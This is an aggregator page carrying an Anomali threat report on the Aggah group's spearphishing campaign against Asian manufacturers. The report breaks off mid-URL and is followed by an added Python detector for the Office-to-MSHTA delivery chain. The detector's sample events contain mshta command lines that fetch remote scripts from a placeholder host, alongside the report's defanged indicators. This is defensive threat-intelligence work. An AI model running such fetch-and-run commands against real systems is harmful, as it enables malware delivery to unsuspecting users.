One Article Review

Home - The article:
Source: Anomali
Identifier: 3217113
Publication date: 2021-08-12 15:00:00 (viewed: 2021-08-12 15:05:27)
Title: Aggah Using Compromised Websites to Target Businesses Across Asia, Including Taiwan Manufacturing Industry
Text: Authored by: Tara Gould and Rory Gould

Key Findings

Spearphishing emails are targeting the manufacturing industry in Taiwan and Korea to spread malware.

Compromised websites are being used to host malicious JavaScript, VBScript and PowerShell scripts, delivering Warzone RAT.

Anomali Threat Research assesses with moderate confidence that this campaign is being conducted by the threat group Aggah.

Overview

Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry in Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the threat group Aggah. Our analysis found multiple PowerPoint files containing malicious macros that used MSHTA to execute a script, which in turn used PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence that this is Aggah.

Aggah

Aggah is an information-motivated threat group that was first identified in March 2019 by researchers from Unit 42.[1] The researchers initially believed the activity was a campaign targeting entities in the United Arab Emirates (UAE). Further investigation by the same team revealed it to be a global phishing campaign designed to deliver RevengeRAT.[2] Unit 42 initially believed, due to shared high-level TTPs as well as the use of RevengeRAT, that Aggah was associated with the Gorgon Group, a Pakistani group known for targeting Western governments.[3] However, prominent Gorgon Group indicators were not observed during that investigation, and therefore Unit 42 was unable to formally associate Aggah with the Gorgon Group. Other researchers agree that Aggah is an Urdu-speaking Pakistani group, due to the use of Urdu words written in Latin script, but stress that this does not mean they are the Gorgon Group.[4] Aggah has been consistently active since 2019, generally using the same identifiable TTPs.

This past year was a notable year for the group, with a 2020 campaign targeting Italian organizations and manufacturing sectors around the world.[5] Later that same year, Aggah was observed likely selling or loaning malware to lower-level Nigerian actors.[6] Historically the group has used Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, usually RevengeRAT.[7] The move to using compromised sites is likely due to the fact that Internet Archive-hosted files are being taken down much more quickly, and is a notable change for Aggah.

Technical Analysis

Email

The infection process began with a custom spearphishing email masquerading as “FoodHub.co.uk”, an online food delivery service based in the United Kingdom. The body of the email contained order and shipping information along with an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam”. The email in Figure 1 below was sent on July 8, 2021 to Fon-star International Technology, a Taiwan-based manufacturing company. Other spearphishing emails were sent to CSE Group, a Taiwanese manufacturing company; FomoTech, a Taiwanese engineering company; and Hyundai Electric, a Korean power company. Using spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah.[8]

Figure 1 - Spoofed Spearphishing Email Sent to Fon Star

PowerPoint File

File name: Purchase order 4500061977,pdf.ppam
MD5: b5a31dd4a6af746f32149f9706d68f45

When we analyzed the PowerPoint file, we found obfuscated macros (Figure 2) contained in the document that used MSHTA to execute JavaScript from “http://j[.]mp/4545h
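The delivery chain described above (a macro-enabled PowerPoint attachment whose name imitates a PDF, and an Office process launching MSHTA to fetch a remote script) gives a defender two concrete things to look for. The following is an added example written for this page, not code from Anomali or from the original post: it runs two checks over constructed, Sysmon-style process-creation events and over attachment names. The event schema (`parent_image`, `image`, `command_line`, `pid`), the sample events and the `shortener.example` URL are all assumptions made for the example.

```python
"""Detections for the delivery chain described above (added example).

1. Attachment-name lure: a macro-enabled Office file whose name embeds a
   fake "pdf" token (".pdf" or ",pdf") ahead of the real extension, so the
   file passes as a PDF at a glance.
2. Process chain: an Office application spawning mshta.exe, and mshta.exe
   being handed a remote URL on its command line (the MSHTA -> remote
   script step).
"""
import json
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
MACRO_ENABLED_EXT = {".ppam", ".pptm", ".ppsm", ".docm", ".xlsm"}
# "pdf" preceded by a dot, comma or space and followed by a real extension.
FAKE_PDF_TOKEN = re.compile(r"[.,\s]pdf\.[a-z]{3,4}$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def is_lure_filename(name):
    """True when a macro-enabled Office file is dressed up as a PDF."""
    ext = PureWindowsPath(name).suffix.lower()
    return ext in MACRO_ENABLED_EXT and bool(FAKE_PDF_TOKEN.search(name))


def classify_process_event(event):
    """Return detection labels for one process-creation event.

    The event is a dict with the assumed keys parent_image, image and
    command_line (full paths; only the basename is compared).
    """
    labels = []
    parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
    image = PureWindowsPath(event.get("image", "")).name.lower()
    cmdline = event.get("command_line", "")
    if image == "mshta.exe":
        if parent in OFFICE_PARENTS:
            labels.append("office_spawns_mshta")
        if REMOTE_URL.search(cmdline):
            labels.append("mshta_remote_script")
    return labels


def scan_events(lines):
    """Run the process check over JSON lines; return one alert per hit."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        labels = classify_process_event(event)
        if labels:
            alerts.append({"pid": event.get("pid"), "labels": labels})
    return alerts


# Constructed sample events (not real telemetry). The URL host is a
# placeholder standing in for the link shortener the post describes.
SAMPLE_EVENTS = [
    json.dumps({"pid": 4112,
                "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
                "image": r"C:\Windows\System32\mshta.exe",
                "command_line": "mshta.exe http://shortener.example/abc123"}),
    json.dumps({"pid": 4120,
                "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\mshta.exe",
                "command_line": r"mshta.exe C:\Users\alice\tools\local.hta"}),
    json.dumps({"pid": 4133,
                "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "image": r"C:\Windows\splwow64.exe",
                "command_line": "splwow64.exe"}),
    json.dumps({"pid": 4140,
                "parent_image": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\mshta.exe",
                "command_line": "mshta.exe https://shortener.example/def456"}),
]

if __name__ == "__main__":
    for name in ("Purchase order 4500061977,pdf.ppam", "Q3 report.pptm"):
        print(f"{name!r}: lure={is_lure_filename(name)}")
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

The first sample event is the chain the post describes and fires both labels; the cmd.exe-launched event fires only the remote-script label, and a locally launched `.hta` fires nothing, which keeps the rule usable on hosts where HTA applications are legitimately used.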
Sent: Yes
Tags: Malware, Tool, Threat
The article does not seem to have been republished after its publication.


The article does not seem to have been taken from an earlier one.